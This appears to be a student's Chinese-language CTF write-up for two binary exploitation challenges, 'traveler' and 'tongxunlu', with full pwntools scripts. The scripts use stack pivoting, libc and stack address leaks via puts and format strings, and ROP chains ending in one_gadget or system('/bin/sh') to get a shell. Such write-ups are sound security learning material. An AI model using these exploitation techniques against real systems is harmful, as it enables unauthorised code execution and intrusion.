traveler
我也不知道为什么会在这题上卡这么久呜呜呜
一看,不就是个简单的栈迁移吗,还给了后门函数
然后试了一下发现echo flag不行
再试了一下/bin/sh也不行
开始泄露libc
突然发现泄露出来后got表发生了点奇怪的变化回不去main了
然后就调试了好久呜呜呜呜呜
最后用了0x401216来控制rsi
把寄存器布置完后
栈迁移把r12 pop 成0 强行用one_gadget拿shell
exp:
from pwn import *
from LibcSearcher import *
context.log_level='debug'
#p = remote('node4.buuoj.cn',27878)
p = process('./traveler')
elf = ELF('./traveler')
libc = ELF("/home/wh1sper/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6")
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x00000000004012c3
lea_ret = 0x0000000000401253
ret = 0x000000000040101a
bss = elf.bss() + 0x400
payload = b'a'*0x20 + p64(bss) + p64(0x401216)
p.sendafter(b"who r u?\n",payload)
p.sendafter(b"How many travels can a person have in his life?\n",b'\n')
payload = b'a'*0x20 + p64(bss+0x20) + p64(0x401216)
p.sendline(payload)
p.sendlineafter(b"How many travels can a person have in his life?\n",b'/bin/sh\x00')
payload = p64(bss+0x30) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.symbols['puts']
print("libc_base-->"+hex(libc_base))
sys_addr = libc_base + libc.symbols['system']
pop_r12 = libc_base + 0x000000000002f709
one_gadget = libc_base + 0xe3afe
payload = p64(pop_r12) + p64(0) + p64(one_gadget) + p64(0) + p64(0x404460-8) + p64(lea_ret)
p.send(payload)
p.sendline(b'/bin/sh\x00')
p.interactive()
呜呜呜tcl
tongxunlu
比赛的时候没出
大致看了下是strtol控制rax然后跳转到sys_write附近把elf_base和libc_base打出来
然后比赛结束师兄给我看了下他的非预期
我只能说好顶
前面是一样的
第一次p8(0x79)返回
第二次p8(0x12),跳到printf这边
这样就可以输入%p这种人为搞格式化字符串泄露内容
payload = b'%7$p|%11$p'
payload = payload.ljust(0x30,b'a')
payload += p64(stack_addr + 0x240) + p8(0x12)
p.send(payload)
这个+0x240等会会说
于是就这样了
后面当我们read的时候
发现rbp其实是前面的stack+0x240,最后输入的时候是rbp-0x130,这时候的输入就要把rsp后面的ret变成rop链,然后就能lea_ret执行rop链了
exp:
from pwn import *
from LibcSearcher import *
context.log_level='debug'
#p = remote('node4.buuoj.cn',25276)
p = process('./xxx')
elf = ELF('./xxx')
libc = ELF("/home/wh1sper/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc.so.6")
payload = b'a'*0x38 + p8(0x79)
p.sendafter(b"if you give me your number,i will give you some hao_kang_de\n",payload)
p.recvuntil(b'is ')
stack_addr = int(p.recv(12),16)
print("stack_addr-->"+hex(stack_addr))
p.sendafter(b"anything want to say?\n",b'Korey0sh1')
payload = b'%7$p|%11$p'
payload = payload.ljust(0x30,b'a')
payload += p64(stack_addr + 0x240) + p8(0x12)
p.send(payload)
p.sendafter(b"anything want to say?\n",b'Korey0sh1')
p.recvuntil(b'0x')
libc_base = int(p.recv(12),16) - 243 - libc.symbols['__libc_start_main']
p.recvuntil(b'0x')
elf_base = int(p.recv(12),16) - 0x978
p.recvuntil(b'is ')
stack_addr = int(p.recv(12),16)
print("libc_base-->"+hex(libc_base))
print("elf_base-->"+hex(elf_base))
print("stack_addr-->"+hex(stack_addr))
sys_addr = libc_base + libc.symbols['system']
str_bin_sh = libc_base + next(libc.search(b'/bin/sh'))
pop_rdi = elf_base + 0xa13
pop_rsi = elf_base + 0xa11
payload = b'a'*0x28 + p64(pop_rdi) + p64(str_bin_sh) + p64(pop_rsi) + p64(0) + p64(0) + p64(sys_addr)
p.sendafter(b"anything want to say?\n",payload)
p.interactive()
呜呜呜
真的tcl